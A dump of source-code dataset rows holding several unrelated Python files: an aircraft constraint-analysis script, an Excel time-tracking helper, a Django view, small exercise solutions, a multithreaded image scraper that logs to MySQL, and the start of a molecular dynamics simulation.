] | JohnDMcMaster@gmail.com |
5530fc1dd282494eed47782c730c869b208595fc | 7a3998efd67cad635559ff8075fde895bf6011b0 | /learning_log/ll_env/lib/python3.6/_collections_abc.py | 56d21c1189ad68a96ad71da06ee12c1cb6a357ec | [] | no_license | zhangaobo/django | 3a983f7165788b3337e809f7d9d8827d8634d367 | 4a7e2ebaaec5ea6471e834d505c6871179f8176c | refs/heads/master | 2020-03-24T23:09:24.918430 | 2018-08-01T07:48:30 | 2018-08-01T07:48:30 | 143,120,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59 | py | /home/zhangaobo/anaconda3/lib/python3.6/_collections_abc.py | [
"865765044@qq.com"
] | 865765044@qq.com |
dcd1312cab4fb26d9d18de7f6ae7ba98ab807bcc | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712184959.py | 2722f9846c7b00deb679ab94edd3570b6ebdba30 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,129 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
def func(x, a0, a1, a2, a3, a4, a5, a6):
return a0 + a1*x + a2*x**2 + a3*x**3 + a4* a4*np.sin(x) + a5*np.cos(x)
#return a * np.exp(b * x) + c
if i == 1:
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4], popt[5])
if k != 2:
p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
else:
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
xdata, ydata = p_w[m+1, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[m+1, :] = func(w_s, popt[0], popt[1],
popt[2], popt[3], popt[4])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"libao@gatech.edu"
] | libao@gatech.edu |
1a832fc6b0bc12b74f738f2e713a5ee2c1ca2225 | 0abc56ccc965e5468fa3d10f61950be0011a2106 | /time_split/time_split.py | 6fdd3fe69061705c9f4dffcc23665f56894a6d1f | [] | no_license | jendit/helper_scripts | 995498ec03ce4b9f41fd05c3c6a765d1db71ae90 | 5e3e585f269710cbdb5da3ca5f89d0025722616a | refs/heads/master | 2020-12-23T04:40:22.748352 | 2020-10-31T21:58:29 | 2020-10-31T21:58:29 | 237,037,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,520 | py | import datetime
import os
import openpyxl
TIME_SPLIT_SHORTCUTS = 'time_split_shortcuts.xlsx'
TIME_SPLIT_RECORDS = 'time_split_records.xlsx'
SEP = os.path.sep
HOME = os.path.expanduser('~')
TIME_SPLIT_SHORTCUTS_PATH = HOME + SEP + 'Documents' + SEP + TIME_SPLIT_SHORTCUTS
TIME_SPLIT_RECORDS_PATH = HOME + SEP + 'Documents' + SEP + TIME_SPLIT_RECORDS
def read_shortcurts():
''' Read shortcut list file into a dictionary.
return - A dictionary with the shortcuts and task name combinations.
'''
sc = {}
wb = openpyxl.load_workbook(TIME_SPLIT_SHORTCUTS_PATH)
sheet = wb.active
row_modifyer = 0
while True:
cell_1 = sheet.cell(row = 2 + row_modifyer, column = 1)
cell_2 = sheet.cell(row = 2 + row_modifyer, column = 2)
if cell_1.value == None or cell_2.value == None:
break
sc[cell_1.value] = cell_2.value
row_modifyer += 1
wb.close()
return sc
def set_task(task_name = ''):
''' Write a task to the Excel-Document.
If the task_name is provided, a new task will be appended.
Regardless if a task_name is provided, the last open task will be closed.
task_name - optional paramenter with the name of the task.
'''
wb = openpyxl.load_workbook(TIME_SPLIT_RECORDS_PATH)
sheet = wb.active
row_count = len(sheet['A']) # calculate the len by getting the first column as this one will always be filled
last_end = sheet.cell(row = row_count, column = 3)
if last_end.value == None:
last_end.value = datetime.datetime.now()
if task_name:
new_row = [task_name, datetime.datetime.now()]
sheet.append(new_row)
wb.save(TIME_SPLIT_RECORDS_PATH)
wb.close()
def input_time_split():
'''Input dialog for the user.
The dialog needs to get the shortcut of a task name to start a task.
If a previous task is not finished, it will be closed automatically.
If no shortcut for a task is provided, the last task in the list will be closed.
'''
print('Please provide a shortcut for a task (see >> time_split_shortcuts.xlsx << for reference).')
print('Or leave empty to just close the last active task.')
task_shortcut = input('Task: ')
if task_shortcut:
try:
shortcut_list = read_shortcurts()
set_task(shortcut_list[task_shortcut])
except KeyError:
print('ERROR, the given shortcut is unknown.')
else:
set_task()
if __name__ == '__main__':
input_time_split()
| [
"github@jendit.de"
] | github@jendit.de |
23293778fc992b1a7ac90ba81cfa91528abec5d1 | 5c549afbb43d729c885549bf8a840d126494d65a | /blog/views.py | b9cf714a360c30369d18b40fb4f04a3c7462c46a | [] | no_license | KateSuhina/my-second-blog | 9bd3521d92ab744f54ea256bd7d6799ea8ea2a0c | 31a96c11b40a5936e380164a4070fd873d04107a | refs/heads/master | 2020-05-02T17:27:08.741910 | 2019-04-13T22:24:36 | 2019-04-13T22:24:36 | 178,098,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from django.shortcuts import render
from django.utils import timezone
from .models import Post
def post_list(request):
posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts': posts})
| [
"kate-suhina@mail.ru"
] | kate-suhina@mail.ru |
503833400f7b454aa0abc77e674ac65f7dc016bd | 40413ee7823b065367ca6946ff2b0b0b1aab06cf | /Assignment_4/count_words.py | b887bae11a08125312b4160cb6c243f10f166824 | [] | no_license | DavinderSinghKharoud/Algorithm-Assignments | 12fda32197835aa1a23a122e4b1eeaeaaa6b52b0 | 026db39306bc7ae4c6414bc1a68b2f578af0dd2a | refs/heads/master | 2020-04-14T03:58:09.225764 | 2019-03-18T22:28:58 | 2019-03-18T22:28:58 | 163,621,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | def count_words(text):
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
noPunc = ""
for char in text:
if char not in punctuations:
noPunc += char
lowerCaseString = noPunc.lower()
dict = {}
lst = lowerCaseString.split()
for item in lst:
if item in dict:
counting = dict[item]
counting += 1
dict[item] = counting
else:
dict[item] = 1
return dict
print(count_words("wow it's Working good wow!! now now ha ha")) | [
"noreply@github.com"
] | DavinderSinghKharoud.noreply@github.com |
303f80432afead7c22d6ea79a6e4a822e3d9d90b | fd403a6f14d4663f05cdb061fbab54ce4056206c | /adventureofcode/2015/day_2_part_2.py | 47d430618636acf207740ed16d9e85f1b7516f58 | [] | no_license | maurobaraldi/coding_puzzles | 2a99d0c7bfe40a00785ce2f9bf10a6ba04f1a350 | c0f455ade9e4eb91f1b444957e4c0acc165e6cc6 | refs/heads/master | 2023-06-10T02:28:56.195126 | 2023-05-25T10:23:23 | 2023-05-25T10:23:23 | 275,801,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/bin/env python3
from utils import get_input
def solution():
data = get_input(2).split()
total = 0
for box in data:
l, w, h = map(int, box.split('x'))
sides = sorted([l, w, h])
total += sides[0] + sides[0] + sides[1] + sides[1] + (l * w * h)
return total
| [
"mauro.baraldi@gmail.com"
] | mauro.baraldi@gmail.com |
fa39ad4a20775edf1df08ae99000b85137c92925 | 84edfe0e79b57bdaa59aa7b0f9c81db5a5ccf4cc | /ibaotu/main.py | 2b7bd4986ef3354b004506079b3617319fe2dfa8 | [] | no_license | Zhangzitong161031/multithreading_crawlers | b5dca0102e63f2e770502484ee7a89a265d35759 | b8ec68b432b2536636e0d231d0bd482fedd71192 | refs/heads/master | 2020-05-24T15:32:51.471202 | 2019-05-20T05:42:53 | 2019-05-20T05:42:53 | 187,334,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,362 | py | # -*- coding:utf-8 -*-
import requests
import threading
from queue import Queue
import time
from proxy_helper import Proxy_helper
from bs4 import BeautifulSoup
import os
import pymysql
from mysqlConfig import MysqlConfig
from StatusCodeError import StatusCodeError
class Spider(threading.Thread):
def __init__(self, threadName, url_queue, validip_que):
threading.Thread.__init__(self)
self.daemon = True
self.mysqlConfig = MysqlConfig
self.url_queue = url_queue
self.validip_que = validip_que
self.threadName=threadName
def run(self):
print("%s开始启动" % (self.name))
self.connectMysql()
global mysqlInitialized
global mysqlInitializeLock
mysqlInitializeLock.acquire()
if not mysqlInitialized:
self.initializeMysql()
mysqlInitialized=True
mysqlInitializeLock.release()
self.makeDir("C:/ibaotu","下载根目录")
while not self.url_queue.empty():
url = self.url_queue.get()
self.getListHtml(url)
self.url_queue.task_done()
def connectMysql(self):
try:
self.mysqlClient = pymysql.connect(
host=self.mysqlConfig.host,
port=self.mysqlConfig.port,
user=self.mysqlConfig.user,
passwd=self.mysqlConfig.password,
database=self.mysqlConfig.database,
use_unicode=True
)
print("%s数据库连接成功"%(self.threadName))
except Exception as e:
print("%s数据库连接异常,错误信息为%s"%(self.threadName,str(e)))
def initializeMysql(self):
try:
with open("initialize.sql",'r',encoding='utf-8') as fd:
sqlStr=fd.read()
sqlCommands = sqlStr.split(';')
for command in sqlCommands:
if command!="":
self.mysqlClient.cursor().execute(command)
print("{}成功创建数据表{}".format(self.threadName,command.split("`")[1]))
print('%s数据库初始化成功!'%(self.threadName))
except BaseException as e:
print("%s数据库初始化异常,错误信息为%s"%(self.threadName,str(e)))
def getListHtml(self,url,repeat_count=0):
# validip = self.validip_que.get()
# proxy = {'http': validip}
try:
response = requests.get(url,timeout=7)
if response.status_code == 200:
page_no = url.split("/")[-1].replace(".html", "")
page_dir = "C:/ibaotu/page" + page_no
self.makeDir(page_dir,"列表页文件夹")
# self.validip_que.put(validip)
response.encoding = "utf-8"
soup = BeautifulSoup(response.text, "lxml")
img_list = soup.select(".pic-box dt img")
for img in img_list:
start_time=time.time()
src = "https:" + img.get('data-url').split("-0.jpg")[0]
alt = img.get("alt")
invalid_str_arr = ["/", ".", "\\", "\r\n", "。", "*", '"', "<", ">", "|", "?", "?", ":"]
for invalid_str in invalid_str_arr:
alt = alt.replace(invalid_str, "")
file_extension_name = src.split("!")[0].split("/")[-1].split(".")[-1]
file_name = alt + "." + file_extension_name
file_path = page_dir + "/" + file_name
self.downloadImage(src,file_path)
else:
raise StatusCodeError("状态码错误,状态码为{}".format(response.status_code))
except BaseException as e:
print("%s列表页%s下载异常,错误信息为%s" % (self.threadName, url, str(e)))
repeat_count += 1
if repeat_count < 4:
print("%s列表页%s下载失败,正在进行第%d次重新下载!" % (self.threadName,url, repeat_count))
self.getListHtml(url, repeat_count)
else:
print("%s列表页%s下载失败" % (self.threadName,url))
self.sqlInsertFailedUrl(url,"list")
def downloadImage(self,src,file_path,repeat_count=0):
# validip = self.validip_que.get()
# proxy = {'http': validip}
try:
start_time=time.time()
response = requests.get(src)
if response.status_code==200:
img_content=response.content
with open(file_path, "wb") as f:
f.write(img_content)
end_time = time.time()
inter = end_time - start_time
print("%s成功下载图片%s,共花费%f秒" % (self.threadName,file_path, inter))
else:
raise StatusCodeError("状态码错误")
except BaseException as e:
print("%s图片%s下载异常,错误信息为%s" % (self.threadName, src, str(e)))
self.sqlInsertFailedUrl(src,"image")
# self.validip_que.get(validip)
repeat_count += 1
if repeat_count < 4:
print("%s图片%s下载抛出异常,正在进行第%d次重新下载!" % (self.threadName, src, repeat_count))
self.downloadImage(src, file_path, repeat_count)
else:
print("%s图片%s下载失败,将添加下载失败信息到数据表" % (self.threadName, src))
self.sqlInsertFailedUrl(src,"image")
def makeDir(self,dir_path,type):
try:
if not os.path.exists(dir_path):
os.mkdir(dir_path)
print("%s成功创建%s%s" % (self.threadName,type,dir_path))
except BaseException as e:
print("%s创建%s异常,错误信息为%s"%(self.threadName,type,str(e)))
def sqlInsertFailedUrl(self,url,type):
try:
global sql
sql = """INSERT IGNORE INTO `ibaotu_failed_{}_url`(url) VALUES ('{}')""".format(type, url)
if self.mysqlClient.cursor().execute(sql):
self.mysqlClient.commit()
print("{}成功插入一条错误的{}记录到数据库".format(self.name,type))
except BaseException as e:
print("{}的sqlInsertFailedUrl抛出异常,异常内容为:{}".format(self.name,str(e)))
def main():
# 开启多线程采集代理IP,并放置于代理IP的队列ipproxy_que里
ip_que = Queue(1200)
validip_que = Queue(10000)
ipCheckoutThreadMount = 15
ipCollectThreadMount = 2
dataCollectThreadMount = 20
# proxy_helper = Proxy_helper(ip_que, validip_que, ipCheckoutThreadMount, ipCollectThreadMount)
# proxy_helper.run()
# time.sleep(10)
url_list = ["https://ibaotu.com/tupian/biaoqingbao/%d.html"% (index) for index in range(1, 27)]
url_que = Queue(1000)
for arc_url in url_list:
url_que.put(arc_url)
for i in range(dataCollectThreadMount):
worker = Spider("数据采集线程%d" % (i), url_que, validip_que)
worker.start()
print("数据采集线程%d开启" % (i))
url_que.join()
if __name__ == "__main__":
mysqlInitializeLock = threading.Lock()
mysqlInitialized = False
main() | [
"2182193904@qq.com"
] | 2182193904@qq.com |
bd1dd81f8bffa61136868af7d217945ab042552e | ca8b3cd04e4f80a1b67b48b07cbaed914927f87e | /Molecular Dynamics V3.py | 4e9f2c9d2282ef8989f92e8c756d3bb5ffd3ea0c | [] | no_license | Armad1ll0/Molecular_Dynamics_Simulation | 649249ef26bf38006d5c65a8cbb387a4345321b2 | 3289a0c4a5f79b41db32cec1dac8eefd11a806b8 | refs/heads/main | 2023-01-09T12:38:35.961957 | 2020-11-09T20:01:45 | 2020-11-09T20:01:45 | 311,408,982 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,274 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 9 11:14:39 2020
@author: amill
"""
from sympy import *
import numpy as np
import random
import matplotlib.pyplot as plt
import math as math
import time
import matplotlib.pyplot as plt
lx = 20
#size of simulation box for MC
simbox_size = np.array([lx, lx])
p = 0.1
sigma = 1
epsilon = 2
T = 1
Nt = 50 #number of time steps
#number of particles in or box. They need to have density 0.95. Density is mass over volume
number_particles = int(p*lx*lx)
#array which randomly assigns the coordiantes of each particle
particle_coords = [(random.uniform(0, lx), random.uniform(0, lx))]
#radius function
def radius(x, y):
r = math.sqrt((x**2)+(y**2))
return r
#while loop that generates particles and gives them coordinates iif they dont overlap within a certain radius, THIS INTIALISES THE POSITIONS
#NEED TO DO BOUNDARY CONDITIONS
counter = 1
while counter < number_particles:
#automatically sets if particles are overlapping to false
overlapping = False
#generates random x and y coordinates for a possible new particle
x = random.uniform(0, lx)
y = random.uniform(0, lx)
#for loop to check if the new particles radius is below the value we need it to be (sigma)
for i,j in particle_coords:
if abs(radius(x-i, y-j)) < sigma:
overlapping = True
#if the particles are not overlapping then it adds its coordiates to the list and increases the counter
if overlapping == False:
particle_coords.append([x, y])
counter += 1
array_particle_coords = np.array(particle_coords)
#setting up random veloctiy of particle. PART OF INTIIALISING THE SYSTEM
particle_velocities = []
for i in range(len(array_particle_coords)):
v_x = random.uniform(-1, 1)
v_y = random.uniform(-1, 1)
particle_velocities.append([v_x, v_y])
particle_velocities = np.array(particle_velocities)
#trying to find average velocities across all particles in x direction
v_x_sum = 0
for i in particle_velocities:
v_x_sum += i[0]
v_x_avg = v_x_sum/len(particle_velocities)
#trying to find average velocities across all particles in y direction
v_y_sum = 0
for i in particle_velocities:
v_y_sum += i[1]
v_y_avg = v_y_sum/len(particle_velocities)
#which average do they want us to use for the F_s function
v_avg_square = ((v_y_sum)**2 + (v_x_sum)**2)/(2*len(particle_coords))
#equation for the drift factor given in the assessment
f_s = math.sqrt((3*T)/(v_avg_square))
#adjusting the particle velocity by the factor given in the lecture to remove intiial dift
adjusted_initial_velocities = []
for i in particle_velocities:
adjusted_velocity_x = (i[0]-v_x_avg) * f_s
adjusted_velocity_y = (i[1]-v_y_avg) * f_s
adjusted_initial_velocities.append([adjusted_velocity_x, adjusted_velocity_y])
#constants needed for lennart jones
r = 1
sigma = 1
alpha = 1
#lennart jones potential equation
U = 4*epsilon*(((sigma/r)**12)+alpha*((sigma/r)**6))
#differential of lennart jones, just to see if I can do it
r = Symbol('r')
U = 4*epsilon*(((sigma/r)**12)+alpha*((sigma/r)**6))
Uprime = U.diff(r) #this is olllllldddddd news now with the variable being reassigned below.
#for loop to calculate the force interactions between different particles
#value of r for which force basically becomes zero
#sum of the forces in x direction
force_sum_x = 0
#sum of forces in y direction
force_sum_y = 0
r_cutoff = 2.5
#list of particle forces in x and y direction
force_x = np.zeros(number_particles)
force_y = np.zeros(number_particles)
for i in range(number_particles):
for j in range(i+1, number_particles):
atom1 = particle_coords[i]
atom2 = particle_coords[j]
#boundary conditions
#distance in the x coords of atoms
dx = atom1[0] - atom2[0]
#distance in the y coords of atoms
dy = atom1[1] - atom2[1]
#if the value of dx is smaller when we pass it through the boundary then change it
if lx - dx%lx < dx:
dx = abs(lx-(dx%lx))
#same witht eh y condition
if lx - dy%lx < dy:
dy = abs((lx-(dy%lx)))
#if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
if ((dx**2) + (dy**2))**0.5 < r_cutoff:
r = (dx**2 + dy**2)**0.5
#differential of lennard jones potential
F = -4*epsilon*(((12*(sigma**12))/r**13) - (((alpha*6*(sigma**6))/r**7)))
#unit values for each direction so we can seperate force into x and y units in the list.
x_unit = (atom1[0]-atom2[0])/r
y_unit = (atom1[1]-atom2[1])/r
force_x[i] += F*x_unit
force_y[i] += F*y_unit
force_x[j] -= F*x_unit
force_y[j] -= F*y_unit
m=1
#kinetic energy of the system
sum_velocity_x = 0
for i in adjusted_initial_velocities:
sum_velocity_x += i[0]**2
sum_velocity_y = 0
for i in adjusted_initial_velocities:
sum_velocity_y += i[1]**2
total_kinetic = 0.5*m*((sum_velocity_x + sum_velocity_y))
#temperature for the system
boltzmann = 1.0
#euqation for temperature of a system
T_new = (2*total_kinetic)/(3*boltzmann)
#potential energy of the system
potential_energy = 0
for i in range(number_particles):
for j in range(number_particles):
if i == j:
continue
else:
atom1 = particle_coords[i]
atom2 = particle_coords[j]
#boundary conditions
#distance in the x coords of atoms
dx = atom1[0] - atom2[0]
#distance in the y coords of atoms
dy = atom1[1] - atom2[1]
#if the value of dx is smaller when we pass it through the boundary then change it
if lx - dx%lx < dx:
dx = abs(lx-(dx%lx))
#same witht eh y condition
if lx - dy%lx < dy:
dy = abs((lx-(dy%lx)))
#if the radius is smaller than the cut off (lennard jones potential is basically 0 after 2.5)
if ((dx**2) + (dy**2))**0.5 < r_cutoff:
r = (dx**2 + dy**2)**0.5
#equation for lennard jones potential energy
U_potential = 4*epsilon*((sigma/r)**12 - alpha*((sigma/r)**6))
potential_energy += U_potential
#total energy of the system
total_energy = total_kinetic + potential_energy
#constants needed for iterations, N is number of time steps and dt is the change in time
num_time_steps = 1000
dt = 0.01
#these are the arrays we will add stuff to. We can use hstack method to add a new array to the end of an array
particles = array_particle_coords
velocities = np.array(adjusted_initial_velocities)
forces = np.array([force_x, force_sum_y])
x_pos_particle_1 = []
for i in particle_coords:
x_pos_particle_1.append(i[0])
x_pos_particle_1 = np.array(x_pos_particle_1)
y_pos_particle_1 = []
